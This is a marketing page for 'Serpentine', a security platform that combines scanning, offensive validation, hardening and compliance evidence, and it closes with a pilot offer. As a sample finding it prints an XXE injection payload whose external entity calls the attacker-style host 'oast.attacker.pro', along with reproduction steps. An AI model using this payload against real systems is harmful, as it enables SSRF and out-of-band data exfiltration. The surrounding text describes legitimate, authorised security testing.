Security Operating System
Your security stack is fragmented.Serpentine replaces it.
One platform for continuous audit and detection, offensive validation, infrastructure hardening, compliance governance, and adversarial research. Five modules. One reasoning layer. One security graph.
Sovereign EU infrastructure · No customer data used for training. · SOC 2 Type II: In progress
Active finding
Exposed admin endpoint
Administrative access exposed without authentication
Napad
Automated exploit confirmed unauthenticated access. Data exfiltration possible.
Output
Proof-of-concept captured • Reproduction steps documented • Business impact assessed
Shared State
Updates exploitability status in shared graph
The Problem
Security stacks were not built to work together.
Most teams run separate systems for audit, testing, hardening, and compliance. Each system creates its own output. None of those outputs become a shared operating state.
Fragmented operating model
Result: manual correlation, delayed validation, duplicated work
The Shift
From fragmented tools to a security operating system.
Serpentine does not add another dashboard. It changes where security work lives: one shared graph across findings, validation, remediation, and evidence.
Current State: Fragmented Tools
Discovery
Vulnerability scanners
Validation
Manual pentest
Remediation
Ticketing systems
Compliance
Spreadsheets
With Serpentine: Unified System
Discovery
Odbrana
Validation
Napad
Remediation
Postava
Compliance
Regulativa
Reality Check
Security posture is often wrong.
Most systems claim controls are in place. Serpentine shows where reality breaks them.
Most security platforms tell you what you've declared. Serpentine tells you what's actually true.
Declared control state
All production access requires MFA
Policy assertion dated Jan 2024
Observed enforcement state
2 production systems have no MFA enforcement evidence
Detected by Odbrana scan + Regulativa mapping
Why this matters: Breaks SOC 2 attestation · Invalidates ISO control A.5.15
Declared control state
All critical findings are resolved
Based on ticket status in ticketing system
Observed enforcement state
Exploitability was never validated
3 findings closed without Napad validation
Why this matters: Creates unverified risk exposure · False closure masks active vulnerabilities
Breaks SOC 2 attestation. Invalidates ISO A.5.15.
This is what Serpentine actually produces
XXE Injection — External Entity Processing
Content-Type: application/xml
<!DOCTYPE root [
<!ENTITY xxe SYSTEM
"http://oast.attacker.pro">
]>
...
DNS callback received from target infrastructure
CVSS 9.1 · CWE-611 · Evidence captured
Exploit Confirmed
Out-of-band DNS callback received
oast.attacker.pro → 203.0.113.42
Reproduction
Send XML payload to endpoint. Observe callback on controlled DNS server.
Proof
External entity resolution confirmed. SSRF to internal network possible.
Linked to finding ODB-2024-0847
Control Contradiction
Audit assertion invalidated. Control requires remediation evidence before re-attestation.
Adversarial Context
This XXE pattern matches campaign cluster NS-A7 TTPs (T1190 → T1059 → T1041). 12 documented exploitations in public threat research. Estimated attacker dwell time post-exploitation: 4-11 days.
Chained risk
If combined with weak egress filtering (detected on adjacent asset), enables out-of-band exfiltration of internal service map.
Recommended priority elevation: validate against authenticated paths within 72h.
See what your system gets wrong
We'll show real contradictions in your environment.
Book a Demo30-minute technical walkthrough · No slides, real system
The Architecture
Inside the shared security graph.
Serpentine does not move data between disconnected tools. It stores findings, validation, remediation, evidence, controls, assets, risks, and actions in one operating state.
Written by: Postava
Used by: All
Written by: Odbrana
Used by: Napad, Regulativa
Written by: Napad
Used by: Postava, Regulativa
Written by: Postava
Used by: Regulativa
Written by: All
Used by: Regulativa
Written by: Regulativa
Used by: All
Written by: All
Used by: Reporting
Written by: All
Used by: Workflow
Hover any entity to see which modules write and read it
This is not a dashboard aggregating external data. This is an operating system where every action updates the same state.
The Platform
Four execution modules. One reasoning layer.
Specialized interfaces for each security discipline, unified by one security graph and one research layer.
Odbrana
Security Audit
Ingests scanner output and structures it into the shared graph.
Napad
Offensive Security
Tests whether findings are actually exploitable in context.
Postava
Infrastructure Hardening
Generates or applies hardening policy and captures proof.
Regulativa
Compliance Governance
Maps outcomes to frameworks and produces audit-ready evidence.
Istraga operates across all four execution modules as the reasoning layer.
All modules read and write to the same security graph. Istraga reasons across all outputs.
The Mechanism
How Serpentine turns findings into evidence.
Normalize
Odbrana
Turns scanner output into structured findings.
Updates the same operating state
Validate
Napad
Confirms whether the risk is exploitable.
Updates the same operating state
Remediate
Postava
Creates or applies hardening policy.
Updates the same operating state
Prove
Regulativa
Maps the outcome to controls and evidence.
Updates the same operating state
Reason
Istraga
Synthesises across all steps. Validates attack paths, predicts emerging risk.
Reads from all
The value is not the steps.
The value is that every step updates one system.
Use Cases
Built for the teams responsible for proving security.
CISO
- Risk visibility across all domains
- Board-ready security posture
- Audit-ready evidence on demand
MSSP / Security Firm
- Repeatable delivery model
- Client-ready reporting
- Multi-tenant workflows
Industries
Built for environments where evidence matters.
Trust
Trust, published.
Security platforms cannot ask for trust while hiding their own controls. SPNT publishes its security posture, subprocessors, responsible disclosure policy, and data handling documentation.
What Serpentine is not
Honest boundaries
Serpentine does not try to replace everything. These are the systems it complements.
Not an EDR
Serpentine does not deploy endpoint agents. Host-level process forensics, real-time syscall monitoring, and post-compromise endpoint hunting require a dedicated endpoint platform. Serpentine handles cloud, identity, and attack-surface coverage. The two are complementary.
Not a SIEM
Serpentine does not retain raw logs. The telemetry layer normalises cloud-audit and identity events into structured graph records — useful for correlation and reasoning, not for petabyte-scale search or custom rule authoring. Organisations needing full raw-log retention should run Serpentine alongside a dedicated SIEM.
Not a CSPM
A dedicated cloud-posture platform may have broader inventory coverage across dozens of cloud accounts. Serpentine prioritises depth over breadth: every finding it surfaces is graph-grounded, exploit-validated, and tied to a compliance obligation. For "which of these actually matters today?" rather than "how many misconfigs do we have?", Serpentine's model is the right one.
The Pilot
30 / 60 / 90 day framework
A structured pilot that proves value before commitment.
Day 30 — Coverage
- Detection module connected to production assets
- First OSINT enrichment loop running
- Initial finding register delivered
Day 60 — Validation
- Offensive validation on highest-priority findings
- Hardening policy generated for two control gaps
- First control-contradiction report delivered to your CISO
Day 90 — Evidence
- Compliance mapping complete for chosen framework (SOC 2 / ISO 27001 / NIS2 / DORA)
- First Istraga consequence analysis published
- Pilot decision: continue, expand, or stop — your call
Pilot guarantee — if at day 90 the pilot has not produced audit-ready evidence on at least one framework, the pilot fee is refunded in full. Refund applies to the pilot engagement only; does not extend to subsequent commercial contracts.
This is not a demo environment. This is how your system will be evaluated.
One finding. Full lifecycle. Real validation.
See what your current stack misses.
Book a live walkthrough. We will show how one finding exposes gaps in validation, remediation, evidence, and adversarial context that most teams never see.